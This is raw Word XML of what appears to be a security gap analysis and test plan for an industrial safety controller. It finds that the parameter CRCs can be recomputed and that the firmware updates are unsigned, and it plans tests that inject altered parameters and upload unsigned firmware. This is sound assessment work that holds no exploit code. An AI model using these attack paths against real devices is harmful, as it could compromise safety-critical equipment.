        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verified each </w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parametrization</w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → EC3 on mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964EFE6" w14:textId="1D9D144B" w:rsidR="009C170F" w:rsidRPr="009C170F" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Certified CRC-Tool (T2, TÜV Süd)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> iParCRC generation (SRIO-9023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20541FD3" w14:textId="4F9D59EF" w:rsidR="009C170F" w:rsidRPr="009C170F" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dual SCPU cross-check + STL — 1oo2 diversity + STM32F7 self-test library + startup tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655B040" w14:textId="26E2D710" w:rsidR="009C170F" w:rsidRPr="009C170F" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FW update behind firewall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Environmental (SRIO-1196</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> compensating, not a device function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20353F24" w14:textId="5DF3B376" w:rsidR="009C170F" w:rsidRPr="006E773B" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update container = unsigned BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stated for completeness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009C170F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this is the deficiency, not a control (SRIO-2953).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3663D" w14:textId="77777777" w:rsidR="002805D3" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301E60F" w14:textId="236A3289" w:rsidR="002805D3" w:rsidRDefault="007207C9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007207C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1 (Part B</w:t>
      </w:r>
      <w:r w:rsidR="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">iParCRC/F_ParCRC are checksums, not MACs; public seed/layout, 16-bit F_ParCRC </w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> recomputable </w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="00E509A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> intentional parameter corruption undetected. Same class as RQ-002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB152D" w14:textId="7510D08B" w:rsidR="007207C9" w:rsidRPr="001F0FC0" w:rsidRDefault="00B054CC" w:rsidP="001F0FC0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B054CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2 (Part D)</w:t>
      </w:r>
      <w:r w:rsidR="001F0FC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001F0FC0" w:rsidRPr="001F0FC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The update installs an unsigned BLOB with no signature verification (EDR 3.10) and no secure boot (EDR 3.14), because there is no on-device trust anchor (EDR 3.12/3.13). Intentional firmware corruption is not prevented by any device-level cryptographic mechanism; the only barriers are the environmental firewall and (as authorization, per RQ-011) the physical/mode gate. This is the decisive gap of the whole requirement set.</w:t>
      </w:r>
      <w:r w:rsidR="001F0FC0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B054CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41772E88" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00F2706B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2706B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-3. </w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A deliberate, IDENTICAL malicious modification applied to both channels </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00334A6F" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dual-SCPU cross-check and the STL</w:t>
      </w:r>
      <w:r w:rsidR="00334A6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systematic</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>coherent</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="00334A6F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the two channels still agree, the cross-comparison passes, and the STL sees a consistent (though malicious) image. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F8BFF" w14:textId="2BED1624" w:rsidR="0012676E" w:rsidRDefault="00337326" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337326">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hence safety integrity mechanisms provide no SECURITY authenticity: they cannot distinguish a genuine image from a coherently-tampered one. That is precisely what a signed-image / secure-boot mechanism (EDR 3.14) would catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F27562" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6E10B5" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7DCD8B" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1275030A" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2763970C" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348CE32E" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CE5E60" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDA0EEE" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B2616A" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118D8C74" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="00F2706B" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F58A6E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC4F6A"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3"/>
        <w:gridCol w:w="3255"/>
        <w:gridCol w:w="1802"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00900880" w14:paraId="5D8929D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6AAF6D" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D89243"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0D6FC785"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1445EF1E"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59F31568"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7F5798" w14:paraId="0F3B6C3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1829D9" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="240A61DF" w14:textId="115153E8" w:rsidR="00900880" w:rsidRPr="008156DA" w:rsidRDefault="006079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156DA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Verify iParCRC/F_ParCRC rejection of a mismatched configuration (references TC-RQ002-01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D595B30" w14:textId="028CC758" w:rsidR="00900880" w:rsidRPr="004B55FC" w:rsidRDefault="00C647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55FC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional CR 3.4 in normal operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280C1C9A" w14:textId="61AFC2F6" w:rsidR="00900880" w:rsidRPr="004B55FC" w:rsidRDefault="006B58A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55FC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B20374" w14:textId="21FFA53D" w:rsidR="00900880" w:rsidRPr="004B55FC"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55FC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D258C9" w14:paraId="096066F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5B3ED45" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23102EB0" w14:textId="77777777" w:rsidR="004B55FC" w:rsidRPr="000F4496" w:rsidRDefault="00335F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F4496">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Recompute valid iParCRC/F_ParCRC over modified parameters; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A2681B" w14:textId="5465E86C" w:rsidR="00900880" w:rsidRPr="00CA0CC6" w:rsidRDefault="00335FA0"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F4496">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">inject </w:t>
            </w:r>
            <w:r w:rsidR="00CA255E" w:rsidRPr="00CA255E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="000F4496">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8086FB" w14:textId="426376E1" w:rsidR="00900880" w:rsidRPr="000F4496" w:rsidRDefault="006B52BF"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F4496">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1 (Part B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478D1E79" w14:textId="77777777" w:rsidR="00962ABB" w:rsidRPr="00242F5A" w:rsidRDefault="00EA065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42F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK for ICS T0836</w:t>
            </w:r>
            <w:r w:rsidR="00962ABB" w:rsidRPr="00242F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00242F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CC74DB6" w14:textId="63C99605" w:rsidR="00900880" w:rsidRPr="00CA0CC6" w:rsidRDefault="00EA065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242F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54FD02C7" w14:textId="42F0F6CF" w:rsidR="00900880" w:rsidRPr="000F4496" w:rsidRDefault="00A96B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F4496">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D0764E" w14:paraId="490D4D2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A969A" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F42AB52" w14:textId="77777777" w:rsidR="00242F5A" w:rsidRPr="00242F5A" w:rsidRDefault="00033A1D" w:rsidP="00033A1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42F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Upload a modified/unsigned firmware BLOB; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7850645D" w14:textId="52DC7A0A" w:rsidR="00900880" w:rsidRPr="00CA0CC6" w:rsidRDefault="00033A1D" w:rsidP="00033A1D">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42F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm no signature/integrity verification before install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F273C7F" w14:textId="7CD46097" w:rsidR="00900880" w:rsidRPr="00242F5A" w:rsidRDefault="00E261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42F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2 (Part D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597FB018" w14:textId="77777777" w:rsidR="00242F5A"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42F5A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-FW[UPDT]-CRYPT-001/004;</w:t>
            </w:r>
            <w:r w:rsidRPr="0069054C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3EBE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM Stage 7;</w:t>
            </w:r>
            <w:r w:rsidRPr="0069054C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F489F97" w14:textId="6FA83195" w:rsidR="00900880" w:rsidRPr="00FE528C" w:rsidRDefault="0069054C"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E528C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE </w:t>
            </w:r>
            <w:r w:rsidR="00942AD6" w:rsidRPr="00FE528C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1693.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001F3A54" w14:textId="6A0AF843" w:rsidR="00900880" w:rsidRPr="004D4C45"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D4C45">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B13FB" w:rsidRPr="00035F89" w14:paraId="49708C9B"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4CE4EAE" w14:textId="02D1B4D6" w:rsidR="009B13FB" w:rsidRDefault="009B13FB" w:rsidP="009B13FB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AD472D" w14:textId="421324DF" w:rsidR="009B13FB" w:rsidRPr="00154CD2"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54CD2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Obtain the update image/BLOB; static analysis for signature/header + binary-hardening review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57903448" w14:textId="737A6284" w:rsidR="009B13FB" w:rsidRPr="00154CD2"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54CD2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Characterizes absence of signing / secure-boot artefacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39225B30" w14:textId="77777777" w:rsidR="009B13FB" w:rsidRPr="009C0080"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C0080">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM Stage 3–5;</w:t>
            </w:r>
          </w:p>
